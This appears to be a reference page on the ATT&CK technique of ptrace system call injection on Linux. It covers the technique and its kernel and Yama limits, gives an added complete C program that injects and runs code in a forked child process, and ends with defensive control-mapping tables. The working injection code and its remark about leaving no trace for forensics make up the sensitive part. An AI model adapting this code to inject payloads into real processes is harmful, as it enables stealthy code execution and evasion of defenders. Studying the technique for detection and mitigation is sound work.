Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process.
Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process (the tracer) to observe and control another process (the tracee), including each of its individual threads, and to read and change its memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into memory the target already maps (ex: a region obtained via <code>malloc</code>) and then transferring execution to it with <code>PTRACE_SETREGS</code>, which sets the instruction pointer register to the address of the injected code. The code itself is written with <code>PTRACE_POKETEXT</code>/<code>PTRACE_POKEDATA</code>, which copy one machine word at a time to a specific address in the target process's memory (ex: the address of the next instruction to execute).(Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018)
Ptrace system call injection is constrained by the kernel's attach checks: a tracer can generally attach only to a process running as the same user that is not more privileged (for example, a setuid program or a process that is not dumpable), and the Linux Yama LSM's <code>kernel.yama.ptrace_scope</code> setting further limits attaching to descendant (child) processes at level 1, to tracers holding <code>CAP_SYS_PTRACE</code> at level 2, and disables attaching entirely at level 3. Injection may therefore not be possible against processes that are not children of the tracer and/or that run with higher privileges.(Citation: BH Linux Inject)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.
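The sequence described above (attach, save state, write code with <code>PTRACE_POKETEXT</code>, redirect execution with <code>PTRACE_SETREGS</code>, resume, collect the result, restore) is shown below as an added example; it is not code from the ATT&CK page, the cited man page or the cited write-ups. It assumes x86-64 Linux and, to stay inside the default Yama <code>ptrace_scope=1</code> restriction noted above, forks its own victim child rather than attaching to an arbitrary process. The payload (<code>mov eax, 39; syscall; int3</code>, i.e. <code>getpid()</code> followed by a breakpoint) is chosen so the injected code's effect is observable: the child's PID appears in the tracee's <code>rax</code>. The return codes <code>INJ_OK</code>, <code>INJ_DENIED</code> and <code>INJ_ERROR</code> are this example's own; <code>INJ_DENIED</code> covers the page's caveat that attaching is refused (EPERM) under a stricter <code>ptrace_scope</code>, a seccomp policy or a more privileged target.

```c
// Added example: x86-64 Linux ptrace code injection into a forked child.
// Not from the original page; payload and result codes are this example's own.
#define _GNU_SOURCE
#include <errno.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

#if !defined(__x86_64__) || !defined(__linux__)
#error "This example targets x86-64 Linux only"
#endif

/* Payload: mov eax,39 (SYS_getpid); syscall; int3. The int3 raises SIGTRAP
 * so the tracer regains control with the syscall result still in rax.
 * NOP-padded to 16 bytes = exactly two PTRACE_POKETEXT words. */
static const uint8_t payload[16] = {
    0xb8, 0x27, 0x00, 0x00, 0x00,                   /* mov eax, 0x27 */
    0x0f, 0x05,                                     /* syscall       */
    0xcc,                                           /* int3          */
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90  /* nop padding   */
};
#define PAYLOAD_WORDS (sizeof(payload) / sizeof(long))

enum { INJ_OK = 0, INJ_DENIED = 1, INJ_ERROR = -1 };

/* Forks a victim that spins on pause(), injects the payload at its current
 * instruction pointer, runs it, and checks that rax now holds the child's PID.
 * Returns INJ_OK, INJ_DENIED (kernel refused PTRACE_ATTACH with EPERM), or INJ_ERROR. */
int inject_getpid_into_child(void)
{
    pid_t child = fork();
    if (child < 0) return INJ_ERROR;
    if (child == 0) { for (;;) pause(); }   /* victim: sleep until signalled */
    usleep(50000);                          /* let the victim reach pause() */

    int result = INJ_ERROR, status;
    struct user_regs_struct saved, regs;
    long saved_code[PAYLOAD_WORDS];

    if (ptrace(PTRACE_ATTACH, child, NULL, NULL) == -1) {
        result = (errno == EPERM) ? INJ_DENIED : INJ_ERROR;
        goto cleanup;
    }
    if (waitpid(child, &status, 0) == -1 || !WIFSTOPPED(status)) goto detach;
    if (ptrace(PTRACE_GETREGS, child, NULL, &saved) == -1) goto detach;
    regs = saved;
    unsigned long long inject_at = saved.rip;   /* overwrite code at the current PC */

    /* Save original code words (PTRACE_PEEKTEXT) so the victim can be restored. */
    for (size_t i = 0; i < PAYLOAD_WORDS; i++) {
        errno = 0;
        saved_code[i] = ptrace(PTRACE_PEEKTEXT, child, (void *)(inject_at + i * sizeof(long)), NULL);
        if (saved_code[i] == -1 && errno) goto detach;
    }
    /* Write the payload one word at a time (PTRACE_POKETEXT). */
    for (size_t i = 0; i < PAYLOAD_WORDS; i++) {
        long word;
        memcpy(&word, payload + i * sizeof(long), sizeof(long));
        if (ptrace(PTRACE_POKETEXT, child, (void *)(inject_at + i * sizeof(long)), (void *)word) == -1)
            goto detach;
    }
    /* Redirect execution (PTRACE_SETREGS). orig_rax = -1 stops the kernel from
     * restarting the interrupted pause() syscall and stepping rip back over it. */
    regs.rip = inject_at;
    regs.orig_rax = (unsigned long long)-1;
    regs.rax = 0;
    if (ptrace(PTRACE_SETREGS, child, NULL, &regs) == -1) goto detach;
    if (ptrace(PTRACE_CONT, child, NULL, NULL) == -1) goto detach;

    /* The payload's int3 stops the child with SIGTRAP; rax holds getpid()'s result. */
    if (waitpid(child, &status, 0) == -1 || !WIFSTOPPED(status) || WSTOPSIG(status) != SIGTRAP) goto detach;
    if (ptrace(PTRACE_GETREGS, child, NULL, &regs) == -1) goto detach;
    result = ((pid_t)regs.rax == child) ? INJ_OK : INJ_ERROR;

    /* Restore original code and registers so the victim could carry on unchanged. */
    for (size_t i = 0; i < PAYLOAD_WORDS; i++)
        ptrace(PTRACE_POKETEXT, child, (void *)(inject_at + i * sizeof(long)), (void *)saved_code[i]);
    ptrace(PTRACE_SETREGS, child, NULL, &saved);
detach:
    ptrace(PTRACE_DETACH, child, NULL, NULL);
cleanup:
    kill(child, SIGKILL);
    waitpid(child, NULL, 0);
    return result;
}

int main(void)
{
    int r = inject_getpid_into_child();
    puts(r == INJ_OK     ? "injected getpid() ran inside the child" :
         r == INJ_DENIED ? "PTRACE_ATTACH denied (ptrace_scope, seccomp or privilege)" :
                           "injection failed");
    return r == INJ_OK ? 0 : 1;
}
```

Build with `gcc -Wall ptrace_inject.c -o ptrace_inject` (file name assumed) and run as an unprivileged user; with the default <code>ptrace_scope=1</code> it succeeds only because the victim is a descendant of the tracer, and on a host set to <code>ptrace_scope=3</code> it reports the denied case instead. Saving <code>orig_rax</code> and the overwritten words is what lets the victim resume cleanly afterwards, which is also why the injection leaves no lasting trace in the process image for a post-hoc memory comparison to find.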
| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| PR.PS-05.02 | Mobile code prevention | Mitigates | T1055.008 | Ptrace System Calls | Mobile code procedures address specific actions taken to prevent the development, acquisition, and introduction of unacceptable mobile code within organizational systems, including requiring mobile code to be digitally signed by a trusted source. |
| PR.AA-05.02 | Privileged system access | Mitigates | T1055.008 | Ptrace System Calls | This diagnostic statement protects against Ptrace System Calls through privileged account management and the use of multi-factor authentication. |

| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| CM-06 | Configuration Settings | mitigates | T1055.008 | Ptrace System Calls | |
| CM-05 | Access Restrictions for Change | mitigates | T1055.008 | Ptrace System Calls | |
| SC-18 | Mobile Code | mitigates | T1055.008 | Ptrace System Calls | |
| SI-02 | Flaw Remediation | mitigates | T1055.008 | Ptrace System Calls | |
| SI-03 | Malicious Code Protection | mitigates | T1055.008 | Ptrace System Calls | |
| IA-02 | Identification and Authentication (Organizational Users) | mitigates | T1055.008 | Ptrace System Calls | |
| SI-04 | System Monitoring | mitigates | T1055.008 | Ptrace System Calls | |
| AC-02 | Account Management | mitigates | T1055.008 | Ptrace System Calls | |
| AC-03 | Access Enforcement | mitigates | T1055.008 | Ptrace System Calls | |
| AC-05 | Separation of Duties | mitigates | T1055.008 | Ptrace System Calls | |
| AC-06 | Least Privilege | mitigates | T1055.008 | Ptrace System Calls | |
| SC-07 | Boundary Protection | mitigates | T1055.008 | Ptrace System Calls | |

| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| defender_for_app_service | Microsoft Defender for Cloud: Defender for App Service | technique_scores | T1055.008 | Ptrace System Calls | Injection attacks are specifically cited as a detection focus for Fileless Attack Detection, which is part of this control, with even more specific references to process hollowing, executable image injection, and threads started in a dynamically allocated code segment. Detection is periodic at an unknown rate. |